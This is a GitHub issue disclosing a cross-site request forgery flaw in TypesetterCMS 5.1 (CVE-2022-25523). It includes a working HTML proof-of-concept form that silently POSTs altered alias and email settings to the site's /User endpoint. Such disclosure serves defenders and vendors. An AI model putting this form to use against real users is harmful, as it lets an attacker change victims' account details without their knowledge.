Skip to content

CSRF Vulnerabilities in TypesetterCMS (Version - 5.1) [CVE-2022-25523] #697

@danishtariqq

Description

@danishtariqq

TypesetterCMS v5.1 was discovered to contain a Cross-Site Request
Forgery (CSRF) which is exploited via a crafted POST request.

Vulnerability Type
Cross-Site Request Forgery (CSRF)

Vendor of Product
TypesetterCMS

Affected Product Code Base
TypesetterCMS - =5.1 are effected

Affected Component
All the POST requests

Attack Type
Remote

Impact Escalation of Privileges
true

Attack Vector

 <html>
   <!-- CSRF PoC-->
   <body>
   <script>history.pushState('', '', '/')</script>
     <form action="https://www.typesettercms.com/User" method="POST">
       <input type="hidden" name="alias" value="TEST&#43;1" />
       <input type="hidden" name="homepage" value="" />
       <input type="hidden" name="email" value="TEST&#43;1&#64;gmail&#46;com" />
      <input type="hidden" name="cmd" value="Save&#32;Settings" />
      <input type="hidden" name="verified" value="" />
     <input type="submit" value="Submit request" />
     </form>
   </body>
  </html>

Discoverers
Danish Tariq
Ali Hassan Ghori

Reference
http://typesettercms.com
https://www.typesettercms.com/User

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions